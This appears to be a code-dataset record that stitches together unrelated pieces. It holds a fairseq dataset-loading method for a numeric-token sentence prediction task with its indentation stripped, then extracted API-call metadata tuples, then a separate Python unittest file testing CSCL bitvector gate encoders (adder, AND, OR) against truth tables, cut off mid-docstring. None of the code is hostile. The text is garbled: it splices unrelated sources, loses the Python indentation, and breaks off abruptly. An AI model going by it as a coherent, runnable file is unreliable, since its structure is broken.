def __init__(self, args, data_dictionary, label_dictionary):
super().__init__(args, data_dictionary, label_dictionary)
assert "▁<num>" in self.dictionary.symbols, "▁<num> not in the tokenizer vocab!"
assert "▁</num>" in self.dictionary.symbols, "▁</num> not in the tokenizer vocab!"
self.bon_idx = self.dictionary.indices['▁<num>']
self.eon_idx = self.dictionary.indices['▁</num>']
print('| bon_idx', self.bon_idx, flush=True)
print('| eon_idx', self.eon_idx, flush=True)
self.tokenizer = spm.SentencePieceProcessor(model_file=self.args.spm_path)
def load_dataset(self, split, combine=False, **kwargs):
"""Load a given dataset split (e.g., train, valid, test)."""
def get_path(key, split):
return os.path.join(self.args.data, key, split)
def make_dataset(key, dictionary):
split_path = get_path(key, split)
try:
dataset = data_utils.load_indexed_dataset(
split_path,
dictionary,
self.args.dataset_impl,
combine=combine,
)
except Exception as e:
if "StorageException: [404] Path not found" in str(e):
logger.warning(f"dataset {e} not found")
dataset = None
else:
raise e
return dataset
input0 = make_dataset("input0", self.source_dictionary)
assert input0 is not None, "could not find dataset: {}".format(
get_path("input0", split)
)
input1 = make_dataset("input1", self.source_dictionary)
if self.args.init_token is not None:
input0 = PrependTokenDataset(input0, self.args.init_token)
if input1 is None:
src_tokens = input0
else:
if self.args.separator_token is not None:
input1 = PrependTokenDataset(input1, self.args.separator_token)
src_tokens = ConcatSentencesDataset(input0, input1)
with data_utils.numpy_seed(self.args.seed):
shuffle = np.random.permutation(len(src_tokens))
src_tokens = maybe_shorten_dataset(
src_tokens,
split,
self.args.shorten_data_split_list,
self.args.shorten_method,
self.max_positions(),
self.args.seed,
)
dataset = {
"id": IdDataset(),
"net_input": {
"src_tokens": RightPadDataset(
src_tokens,
pad_idx=self.source_dictionary.pad(),
),
"src_number_token_values": NumberValueDataset(
src_tokens,
vocab=self.dictionary,
tokenizer=self.tokenizer,
number_value_cutoff=self.args.number_value_cutoff,
send_log_value=self.args.send_log_value
),
"src_lengths": NumelDataset(src_tokens, reduce=False),
},
"nsentences": NumSamplesDataset(),
"ntokens": NumelDataset(src_tokens, reduce=True),
}
if self.args.add_prev_output_tokens:
prev_tokens_dataset = RightPadDataset(
RollDataset(src_tokens, 1),
pad_idx=self.dictionary.pad(),
)
dataset["net_input"].update(
prev_output_tokens=prev_tokens_dataset,
)
if not self.args.regression_target:
label_dataset = make_dataset("label", self.label_dictionary)
if label_dataset is not None:
dataset.update(
target=OffsetTokensDataset(
StripTokenDataset(
label_dataset,
id_to_strip=self.label_dictionary.eos(),
),
offset=-self.label_dictionary.nspecial,
)
)
else:
label_path = "{0}.label".format(get_path("label", split))
if os.path.exists(label_path):
def parse_regression_target(i, line):
values = line.split()
assert (
len(values) == self.args.num_classes
), f'expected num_classes={self.args.num_classes} regression target values on line {i}, found: "{line}"'
return [float(x) for x in values]
with open(label_path) as h:
dataset.update(
target=RawLabelDataset(
[
parse_regression_target(i, line.strip())
for i, line in enumerate(h.readlines())
]
)
)
nested_dataset = NestedDictionaryDataset(
dataset,
sizes=[src_tokens.sizes],
)
if self.args.no_shuffle:
dataset = nested_dataset
else:
dataset = SortDataset(
nested_dataset,
# shuffle
sort_order=[shuffle],
)
logger.info("Loaded {0} with #samples: {1}".format(split, len(dataset)))
self.datasets[split] = dataset
return self.datasets[split]
|
[
"fairseq.data.NumelDataset",
"fairseq.data.NestedDictionaryDataset",
"fairseq.data.NumberValueDataset",
"sentencepiece.SentencePieceProcessor",
"fairseq.tasks.register_task",
"fairseq.data.PrependTokenDataset",
"fairseq.data.SortDataset",
"os.path.exists",
"fairseq.data.ConcatSentencesDataset",
"fairseq.data.NumSamplesDataset",
"fairseq.data.data_utils.numpy_seed",
"fairseq.data.RollDataset",
"fairseq.data.IdDataset",
"fairseq.data.data_utils.load_indexed_dataset",
"os.path.join",
"logging.getLogger"
] |
[((660, 687), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (677, 687), False, 'import logging\n'), ((691, 736), 'fairseq.tasks.register_task', 'register_task', (['"""sentence_prediction_num_norm"""'], {}), "('sentence_prediction_num_norm')\n", (704, 736), False, 'from fairseq.tasks import LegacyFairseqTask, register_task\n'), ((3218, 3275), 'sentencepiece.SentencePieceProcessor', 'spm.SentencePieceProcessor', ([], {'model_file': 'self.args.spm_path'}), '(model_file=self.args.spm_path)\n', (3244, 3275), True, 'import sentencepiece as spm\n'), ((7624, 7682), 'fairseq.data.NestedDictionaryDataset', 'NestedDictionaryDataset', (['dataset'], {'sizes': '[src_tokens.sizes]'}), '(dataset, sizes=[src_tokens.sizes])\n', (7647, 7682), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((3460, 3500), 'os.path.join', 'os.path.join', (['self.args.data', 'key', 'split'], {}), '(self.args.data, key, split)\n', (3472, 3500), False, 'import os\n'), ((4426, 4475), 'fairseq.data.PrependTokenDataset', 'PrependTokenDataset', (['input0', 'self.args.init_token'], {}), '(input0, self.args.init_token)\n', (4445, 4475), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((4710, 4748), 'fairseq.data.ConcatSentencesDataset', 'ConcatSentencesDataset', (['input0', 'input1'], {}), '(input0, input1)\n', (4732, 4748), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((4763, 4800), 'fairseq.data.data_utils.numpy_seed', 'data_utils.numpy_seed', (['self.args.seed'], {}), '(self.args.seed)\n', (4784, 4800), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((5147, 5158), 'fairseq.data.IdDataset', 'IdDataset', ([], {}), '()\n', (5156, 5158), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((5791, 5810), 'fairseq.data.NumSamplesDataset', 'NumSamplesDataset', ([], {}), '()\n', (5808, 5810), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((5835, 5872), 'fairseq.data.NumelDataset', 'NumelDataset', (['src_tokens'], {'reduce': '(True)'}), '(src_tokens, reduce=True)\n', (5847, 5872), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((6822, 6848), 'os.path.exists', 'os.path.exists', (['label_path'], {}), '(label_path)\n', (6836, 6848), False, 'import os\n'), ((7825, 7874), 'fairseq.data.SortDataset', 'SortDataset', (['nested_dataset'], {'sort_order': '[shuffle]'}), '(nested_dataset, sort_order=[shuffle])\n', (7836, 7874), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((3635, 3736), 'fairseq.data.data_utils.load_indexed_dataset', 'data_utils.load_indexed_dataset', (['split_path', 'dictionary', 'self.args.dataset_impl'], {'combine': 'combine'}), '(split_path, dictionary, self.args.\n dataset_impl, combine=combine)\n', (3666, 3736), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((4629, 4683), 'fairseq.data.PrependTokenDataset', 'PrependTokenDataset', (['input1', 'self.args.separator_token'], {}), '(input1, self.args.separator_token)\n', (4648, 4683), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((5386, 5566), 'fairseq.data.NumberValueDataset', 'NumberValueDataset', (['src_tokens'], {'vocab': 'self.dictionary', 'tokenizer': 'self.tokenizer', 'number_value_cutoff': 'self.args.number_value_cutoff', 'send_log_value': 'self.args.send_log_value'}), '(src_tokens, vocab=self.dictionary, tokenizer=self.\n tokenizer, number_value_cutoff=self.args.number_value_cutoff,\n send_log_value=self.args.send_log_value)\n', (5404, 5566), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((5710, 5748), 'fairseq.data.NumelDataset', 'NumelDataset', (['src_tokens'], {'reduce': '(False)'}), '(src_tokens, reduce=False)\n', (5722, 5748), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n'), ((5997, 6023), 'fairseq.data.RollDataset', 'RollDataset', (['src_tokens', '(1)'], {}), '(src_tokens, 1)\n', (6008, 6023), False, 'from fairseq.data import ConcatSentencesDataset, Dictionary, IdDataset, NestedDictionaryDataset, NumelDataset, NumSamplesDataset, OffsetTokensDataset, PrependTokenDataset, RawLabelDataset, RightPadDataset, RollDataset, SortDataset, StripTokenDataset, NumberValueDataset, data_utils\n')]
|
import abc
import unittest
import itertools
import math
import cscl.bitvector_gate_encoders as bvg
import cscl.interfaces as cscl_if
from cscl_tests.testutils.trivial_sat_solver import TrivialSATSolver
from cscl_tests.testutils.logging_clause_consumer_decorator import LoggingClauseConsumerDecorator
class TestLiteralFactory(cscl_if.CNFLiteralFactory):
def __init__(self):
self.max_var = 0
def create_literal(self):
self.max_var += 1
return self.max_var
def get_num_variables(self):
return self.max_var
def has_literal(self, lit):
return lit != 0 and abs(lit) <= self.max_var
class CollectingClauseConsumer(cscl_if.ClauseConsumer):
def __init__(self):
self.clauses = []
def consume_clause(self, clause):
self.clauses.append(clause)
def has_clause(self, clause):
return clause in self.clauses
def get_clauses_in_consumption_order(self):
return self.clauses[:]
def get_num_clauses(self):
return len(self.clauses)
class TestEncodeGateVector(unittest.TestCase):
def test_is_noop_on_empty_inputs(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
def __should_not_be_called(*_):
self.assertTrue(False, "This function should not be called")
result = bvg.encode_gate_vector(clause_consumer, lit_factory,
__should_not_be_called,
lhs_input_lits=[], rhs_input_lits=[], output_lits=[])
self.assertEqual(len(result), 0)
self.assertEqual(clause_consumer.get_num_clauses(), 0)
self.assertEqual(lit_factory.get_num_variables(), 0)
def test_throws_exception_when_input_vec_lengths_mismatch(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
def __noop_encoder(*_):
pass
lits = [lit_factory.create_literal() for _ in range(10)]
with self.assertRaises(ValueError):
bvg.encode_gate_vector(clause_consumer, lit_factory,
__noop_encoder,
lhs_input_lits=[lits[0]],
rhs_input_lits=[lits[1], lits[2]],
output_lits=[lits[3]])
self.assertEqual(clause_consumer.get_num_clauses(), 0)
self.assertEqual(lit_factory.get_num_variables(), 10)
def test_throws_exception_when_output_vec_length_mismatches(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
def __noop_encoder(*_):
pass
lits = [lit_factory.create_literal() for _ in range(10)]
with self.assertRaises(ValueError):
bvg.encode_gate_vector(clause_consumer, lit_factory,
__noop_encoder,
lhs_input_lits=[lits[0], lits[1]],
rhs_input_lits=[lits[2], lits[3]],
output_lits=[lits[4]])
self.assertEqual(clause_consumer.get_num_clauses(), 0)
self.assertEqual(lit_factory.get_num_variables(), 10)
def test_generates_None_literals_when_no_outputs_specified(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
lits = [lit_factory.create_literal() for _ in range(10)]
collected_output_lits = []
def __output_collecting_encoder(_1, _2, _3, output_lit):
collected_output_lits.append(output_lit)
return output_lit
result = bvg.encode_gate_vector(clause_consumer, lit_factory, __output_collecting_encoder,
lhs_input_lits=[lits[0], lits[1]],
rhs_input_lits=[lits[2], lits[3]],
output_lits=None)
self.assertEqual(result, collected_output_lits)
self.assertEqual(result, [None, None])
@staticmethod
def __create_recording_encoder(recording_target: list):
def __recording_encoder(*args):
recording_target.append(args)
return -1
return __recording_encoder
def test_calls_basic_encoder_once_for_unary_bit_vectors(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
recording_target = []
bvg.encode_gate_vector(clause_consumer, lit_factory,
self.__create_recording_encoder(recording_target),
lhs_input_lits=[1],
rhs_input_lits=[2],
output_lits=[3])
expected_rt = [(clause_consumer, lit_factory, (1, 2), 3)]
self.assertEqual(recording_target, expected_rt,
"Unexpected encoder calls:\n" + str(recording_target) + "\nvs.\n" + str(expected_rt))
def test_calls_basic_encoder_thrice_for_ternary_bit_vectors(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
recording_target = []
bvg.encode_gate_vector(clause_consumer, lit_factory,
self.__create_recording_encoder(recording_target),
lhs_input_lits=[10, 20, 30],
rhs_input_lits=[11, 21, 31],
output_lits=[1, 2, 3])
expected_rt = [(clause_consumer, lit_factory, (10, 11), 1),
(clause_consumer, lit_factory, (20, 21), 2),
(clause_consumer, lit_factory, (30, 31), 3)]
self.assertEqual(recording_target, expected_rt,
"Unexpected encoder calls:\n" + str(recording_target) + "\nvs.\n" + str(expected_rt))
def int_to_bitvec(i, result_width):
return tuple(1 if (i & 1 << idx) != 0 else 0 for idx in range(0, result_width))
def apply_truth_table_setting(positive_lits, setting):
return [x if s >= 1 else -x for x, s in zip(positive_lits, setting)]
class TestEncodeBVRippleCarryAdderGate(unittest.TestCase):
def __test_for_truth_table(self, arity, use_carry_in, use_carry_out, truth_table):
for table_entry in truth_table:
input_setting, output_setting = table_entry
lhs_setting, rhs_setting, carry_in_setting = input_setting
output_setting, carry_out_setting = output_setting
checker = TrivialSATSolver()
lhs_input_lits = [checker.create_literal() for _ in range(0, arity)]
rhs_input_lits = [checker.create_literal() for _ in range(0, arity)]
carry_in = checker.create_literal() if use_carry_in else None
carry_out = checker.create_literal() if use_carry_out else None
clause_consumer = LoggingClauseConsumerDecorator(checker)
output_lits = bvg.encode_bv_ripple_carry_adder_gate(clause_consumer, checker,
lhs_input_lits, rhs_input_lits,
output_lits=None, carry_in_lit=carry_in,
carry_out_lit=carry_out)
# Compute the SAT solver assumption setting for this entry:
probe_lhs = apply_truth_table_setting(lhs_input_lits, lhs_setting)
probe_rhs = apply_truth_table_setting(rhs_input_lits, rhs_setting)
if use_carry_in:
probe_lhs.append(carry_in if carry_in_setting >= 1 else -carry_in)
probe_out = apply_truth_table_setting(output_lits, output_setting)
if use_carry_out:
probe_out.append(carry_out if carry_out_setting >= 1 else -carry_out)
# Check that the truth table entry satisfies the encoding:
assumptions_pos = list(itertools.chain(probe_lhs, probe_rhs, probe_out))
self.assertTrue(checker.solve(assumptions_pos),
"Encoding failed for truth table entry " + str(table_entry)
+ "\n(should be satisfiable, but is not)"
+ "\nEncoding:\n" + clause_consumer.to_string()
+ "\nAssumptions: " + str([x for x in assumptions_pos]))
# Check that the gate encodes a function by excluding the output configuration:
clause_consumer.consume_clause([-x for x in probe_out])
assumptions_neg = list(itertools.chain(probe_lhs, probe_rhs))
self.assertFalse(checker.solve(assumptions_neg),
"Encoding failed for truth table entry " + str(table_entry)
+ "\n(function property violated)"
+ "\nEncoding:\n" + clause_consumer.to_string()
+ "\nAssumptions: " + str([x for x in assumptions_neg]))
@staticmethod
def __generate_full_truth_table(input_width, carry_in_settings):
result = []
for lhs_setting in range(0, 2**input_width):
for rhs_setting in range(0, 2**input_width):
for carry_in_setting in carry_in_settings:
expected_output = lhs_setting + rhs_setting + carry_in_setting
expected_carry_output = 1 if expected_output & 2**input_width != 0 else 0
# Remove "overflowing" bit from output:
if expected_carry_output == 1:
expected_output = expected_output ^ 2**input_width
input_setting = (int_to_bitvec(lhs_setting, input_width),
int_to_bitvec(rhs_setting, input_width),
carry_in_setting)
output_setting = (int_to_bitvec(expected_output, input_width),
expected_carry_output)
result.append((input_setting, output_setting))
return result
def __truthtable_based_test(self, input_width, use_carry_in, use_carry_out):
carry_in_settings = [0, 1] if use_carry_in else [0]
truth_table = self.__generate_full_truth_table(input_width=input_width, carry_in_settings=carry_in_settings)
self.__test_for_truth_table(input_width, use_carry_in=use_carry_in, use_carry_out=use_carry_out,
truth_table=truth_table)
def test_for_bv_width_1_no_carries(self):
self.__truthtable_based_test(1, use_carry_in=False, use_carry_out=False)
def test_for_bv_width_1_input_carry(self):
self.__truthtable_based_test(1, use_carry_in=True, use_carry_out=False)
def test_for_bv_width_1_output_carry(self):
self.__truthtable_based_test(1, use_carry_in=False, use_carry_out=True)
def test_for_bv_width_1_all_carries(self):
self.__truthtable_based_test(1, use_carry_in=True, use_carry_out=True)
def test_for_bv_width_2_no_carries(self):
self.__truthtable_based_test(2, use_carry_in=False, use_carry_out=False)
def test_for_bv_width_2_input_carry(self):
self.__truthtable_based_test(2, use_carry_in=True, use_carry_out=False)
def test_for_bv_width_2_output_carry(self):
self.__truthtable_based_test(2, use_carry_in=False, use_carry_out=True)
def test_for_bv_width_2_all_carries(self):
self.__truthtable_based_test(2, use_carry_in=True, use_carry_out=True)
def test_for_bv_width_3_no_carries(self):
self.__truthtable_based_test(3, use_carry_in=False, use_carry_out=False)
def test_for_bv_width_3_input_carry(self):
self.__truthtable_based_test(3, use_carry_in=True, use_carry_out=False)
def test_for_bv_width_3_output_carry(self):
self.__truthtable_based_test(3, use_carry_in=False, use_carry_out=True)
def test_for_bv_width_3_all_carries(self):
self.__truthtable_based_test(3, use_carry_in=True, use_carry_out=True)
def test_for_bv_width_4_no_carries(self):
self.__truthtable_based_test(4, use_carry_in=False, use_carry_out=False)
def test_for_bv_width_4_input_carry(self):
self.__truthtable_based_test(4, use_carry_in=True, use_carry_out=False)
def test_for_bv_width_4_output_carry(self):
self.__truthtable_based_test(4, use_carry_in=False, use_carry_out=True)
def test_for_bv_width_4_all_carries(self):
self.__truthtable_based_test(4, use_carry_in=True, use_carry_out=True)
class AbstractTruthTableBasedBitvectorGateTest(abc.ABC):
"""
Base class for truth-table-based bitvector-gate tests.
"""
def __init__(self):
if not isinstance(self, unittest.TestCase):
raise RuntimeError("This mixin may only be used with test cases, since it uses assertRaises")
@abc.abstractmethod
def encode_gate_under_test(self, clause_consumer: cscl_if.ClauseConsumer,
lit_factory: cscl_if.CNFLiteralFactory, gate_arity: int):
"""
Encodes the gate under test for the given agate arity, using `lit_factory` to create new literals
and `clause_consumer` to store the result.
:param clause_consumer: The clause consumer receiving the gate encoding.
:param lit_factory: The literal factory used to create new literals.
:param gate_arity: The gate's arity.
:return: a tuple (x,y) with x being the concatenation of the gate's input literals
and y being the concatenation of the gate's output literals. Note: the order and amount
of literals contained in x must equal the order and amount of assignments in the truth
table's input setting tuples (i.e. the i'th literal in x has the same meaning as the
i'th entry in the truth table's input settings). Likewise, the order and amount of literals
in y must equal the order and amount of assignments in the truth table's output setting
tuples.
"""
pass
@abc.abstractmethod
def generate_truth_table(self, gate_arity: int):
"""
Generates the truth which the encoder returned by __get_bitvector_gate_encoder_under_test()
is supposed to satisfy.
:param gate_arity: A nonzero, non-negative integer.
:return: A tuple [x_1, x_2, ..., x_(2^(gate_arity+1))] with, for all 1 <= i <= 2^(gate_arity+1), x_i is a tuple
(l+r, o) with l, r, o being tuples of length `gate_arity` containing elements in {0, 1}.
l signifies the left-hand-side input assignment, r signifies the right-hand-side
assignment, o signifies the output assignment. If there are two tuples (x, y1) and (x, y2), then
y1 = y2.
"""
@abc.abstractmethod
def get_bitvector_gate_encoder_under_test(self):
"""
Returns the bitvector gate encoder function under test.
:return: the bitvector gate encoder function under test.
"""
pass
@abc.abstractmethod
def is_encoder_under_test_bv_predicate(self):
"""
Returns True iff the encoder returned by get_bitvector_gate_encoder_under_test
encodes a bitvector predicate function
(i.e. the gate has a single output literal) and False iff the gate is a "full"
bitvector gate function (i.e. the gate has W output literals, where W is the
gate's arity).
:return: a bool value as described above.
"""
pass
def __test_for_truth_table(self, gate_arity: int):
truth_table = self.generate_truth_table(gate_arity)
for table_entry in truth_table:
input_setting, output_setting = table_entry
checker = TrivialSATSolver()
clause_consumer = LoggingClauseConsumerDecorator(checker)
# Encode the bitvector gate
input_lits, output_lits = self.encode_gate_under_test(clause_consumer, checker, gate_arity)
# Check that the setting satisfies the constraint
probe_input = apply_truth_table_setting(input_lits, input_setting)
probe_output = apply_truth_table_setting(output_lits, output_setting)
assumptions_pos = probe_input + probe_output
has_correct_value = checker.solve(assumptions_pos)
if not has_correct_value:
if checker.solve(probe_input):
print("The gate forces an incorrect model:")
checker.print_model()
else:
print("The gate has no satisfiable assignment for this input configuration")
# noinspection PyUnresolvedReferences
self.assertTrue(has_correct_value,
"Encoding failed for truth table entry " + str(table_entry)
+ "\n(should be satisfiable, but is not)"
+ "\nEncoding:\n" + clause_consumer.to_string()
+ "\nAssumptions: " + str(assumptions_pos))
# Check that no other output setting satisfies the constraint
clause_consumer.consume_clause([-x for x in probe_output])
assumptions_neg = probe_input
is_functional_rel = not checker.solve(assumptions_neg)
if not is_functional_rel:
print("Unexpectedly found model:")
checker.print_model()
# noinspection PyUnresolvedReferences
self.assertTrue(is_functional_rel,
"Encoding failed for truth table entry " + str(table_entry)
+ "\n(function property violated)"
+ "\nEncoding:\n" + clause_consumer.to_string()
+ "\nAssumptions: " + str(assumptions_neg))
def test_conforms_to_truth_table_for_bv_width_1(self):
self.__test_for_truth_table(gate_arity=1)
def test_conforms_to_truth_table_for_bv_width_2(self):
self.__test_for_truth_table(gate_arity=2)
def test_conforms_to_truth_table_for_bv_width_3(self):
self.__test_for_truth_table(gate_arity=3)
def test_conforms_to_truth_table_for_bv_width_4(self):
self.__test_for_truth_table(gate_arity=4)
def test_refuses_input_bv_with_length_mismatch(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
lhs_input_lits = [lit_factory.create_literal() for _ in range(0, 3)]
rhs_input_lits = [lit_factory.create_literal() for _ in range(0, 2)]
encoder_under_test = self.get_bitvector_gate_encoder_under_test()
# See assertion in __init__:
# noinspection PyCallByClass
# noinspection PyTypeChecker
with unittest.TestCase.assertRaises(self, ValueError):
encoder_under_test(clause_consumer=clause_consumer,
lit_factory=lit_factory,
lhs_input_lits=lhs_input_lits,
rhs_input_lits=rhs_input_lits)
def test_uses_and_returns_provided_output_literals(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
lhs_input_lits = [lit_factory.create_literal() for _ in range(0, 3)]
rhs_input_lits = [lit_factory.create_literal() for _ in range(0, 3)]
output_lits = lit_factory.create_literal() if self.is_encoder_under_test_bv_predicate() \
else [lit_factory.create_literal() for _ in range(0, 3)]
encoder_under_test = self.get_bitvector_gate_encoder_under_test()
if self.is_encoder_under_test_bv_predicate():
result = encoder_under_test(clause_consumer=clause_consumer,
lit_factory=lit_factory,
lhs_input_lits=lhs_input_lits,
rhs_input_lits=rhs_input_lits,
output_lit=output_lits)
# noinspection PyUnresolvedReferences
self.assertEqual(result, output_lits)
else:
result = encoder_under_test(clause_consumer=clause_consumer,
lit_factory=lit_factory,
lhs_input_lits=lhs_input_lits,
rhs_input_lits=rhs_input_lits,
output_lits=output_lits)
# noinspection PyUnresolvedReferences
self.assertEqual(list(result), output_lits)
def test_creates_output_literals_if_none_provided(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
lhs_input_lits = [lit_factory.create_literal() for _ in range(0, 3)]
rhs_input_lits = [lit_factory.create_literal() for _ in range(0, 3)]
all_inputs = lhs_input_lits + rhs_input_lits
encoder_under_test = self.get_bitvector_gate_encoder_under_test()
result = encoder_under_test(clause_consumer, lit_factory, lhs_input_lits, rhs_input_lits)
if self.is_encoder_under_test_bv_predicate():
# noinspection PyUnresolvedReferences
self.assertTrue(result not in all_inputs)
# noinspection PyUnresolvedReferences
self.assertTrue(-result not in all_inputs)
else:
# noinspection PyUnresolvedReferences
self.assertFalse(any(x in all_inputs for x in result))
# noinspection PyUnresolvedReferences
self.assertFalse(any(-x in all_inputs for x in result))
class AbstractTruthTableBasedBitvectorToBitvectorGateTest(AbstractTruthTableBasedBitvectorGateTest):
"""
Base class for truth-table-based bitvector-gate tests where the encoded gate's output represents
a bitvector (i.e. the gate encoder returns a list of literals).
"""
def test_refuses_output_bv_with_length_mismatch(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
lhs_input_lits = [lit_factory.create_literal() for _ in range(0, 3)]
rhs_input_lits = [lit_factory.create_literal() for _ in range(0, 3)]
output_lits = [lit_factory.create_literal() for _ in range(0, 2)]
encoder_under_test = self.get_bitvector_gate_encoder_under_test()
# See assertion in __init__:
# noinspection PyCallByClass
# noinspection PyTypeChecker
with unittest.TestCase.assertRaises(self, ValueError):
encoder_under_test(clause_consumer=clause_consumer,
lit_factory=lit_factory,
lhs_input_lits=lhs_input_lits,
rhs_input_lits=rhs_input_lits,
output_lits=output_lits)
def is_encoder_under_test_bv_predicate(self):
return False
class AbstractTruthTableBasedPlainBitvectorToBitvectorGateTest(AbstractTruthTableBasedBitvectorToBitvectorGateTest):
"""
Base class for truth-table-based bitvector-gate tests where the encoded gate's output represents
a bitvector (i.e. the gate encoder returns a list of literals), where the bitvector encoder takes
no more arguments than
- clause_consumer: the clause consumer
- lit_factory: the literal factory
- lhs_input_lits, rhs_input_lits: the lhs rsp. rhs input literals
- output_lits: the output literals (optional argument)
"""
def encode_gate_under_test(self, clause_consumer: cscl_if.ClauseConsumer,
lit_factory: cscl_if.CNFLiteralFactory, gate_arity: int):
lhs_input_lits = [lit_factory.create_literal() for _ in range(0, gate_arity)]
rhs_input_lits = [lit_factory.create_literal() for _ in range(0, gate_arity)]
encoder_under_test = self.get_bitvector_gate_encoder_under_test()
output_lits = encoder_under_test(clause_consumer=clause_consumer,
lit_factory=lit_factory,
lhs_input_lits=lhs_input_lits,
rhs_input_lits=rhs_input_lits)
return lhs_input_lits+rhs_input_lits, output_lits
class AbstractTruthTableBasedPlainBitvectorPredicateGateTest(AbstractTruthTableBasedBitvectorGateTest):
"""
Base class for truth-table-based bitvector-gate tests where the encoded gate's output is a single
literal, where the bitvector encoder takes no more arguments than
- clause_consumer: the clause consumer
- lit_factory: the literal factory
- lhs_input_lits, rhs_input_lits: the lhs rsp. rhs input literals
- output_lit: the output literal (optional argument)
"""
def encode_gate_under_test(self, clause_consumer: cscl_if.ClauseConsumer,
lit_factory: cscl_if.CNFLiteralFactory, gate_arity: int):
lhs_input_lits = [lit_factory.create_literal() for _ in range(0, gate_arity)]
rhs_input_lits = [lit_factory.create_literal() for _ in range(0, gate_arity)]
encoder_under_test = self.get_bitvector_gate_encoder_under_test()
output_lit = encoder_under_test(clause_consumer=clause_consumer,
lit_factory=lit_factory,
lhs_input_lits=lhs_input_lits,
rhs_input_lits=rhs_input_lits)
return lhs_input_lits+rhs_input_lits, [output_lit]
def is_encoder_under_test_bv_predicate(self):
return True
#
# Tests for "plain" bitvector functions (and, or, xor, subtraction):
#
def generate_truth_table_for_binary_op(gate_arity: int, binary_op):
"""
Generates a truth table using the given binary operation on integers.
:param gate_arity: The gate's arity.
:param binary_op: A function mapping two integers to an integer.
:return: The truth table for a gate applying binary_op to the input bitvectors. Only the first `gate_arity`
bits of the result of invoking binary_op are considered. The returned object is a truth table in
the sense of AbstractTruthTableBasedBitvectorGateTest's documentation, with all possible input assignments
occurring in the truth table.
"""
truth_table = []
for lhs, rhs in itertools.product(range(0, 2 ** gate_arity), range(0, 2 ** gate_arity)):
output = binary_op(lhs, rhs)
table_entry = (int_to_bitvec(lhs, gate_arity) + int_to_bitvec(rhs, gate_arity),
int_to_bitvec(output, gate_arity))
truth_table.append(table_entry)
return truth_table
class TestEncodeBVAndGate(unittest.TestCase, AbstractTruthTableBasedPlainBitvectorToBitvectorGateTest):
"""
Test for bvg.encode_bv_and_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_and_gate
def generate_truth_table(self, gate_arity: int):
return generate_truth_table_for_binary_op(gate_arity, lambda x, y: x & y)
class TestEncodeBVOrGate(unittest.TestCase, AbstractTruthTableBasedPlainBitvectorToBitvectorGateTest):
"""
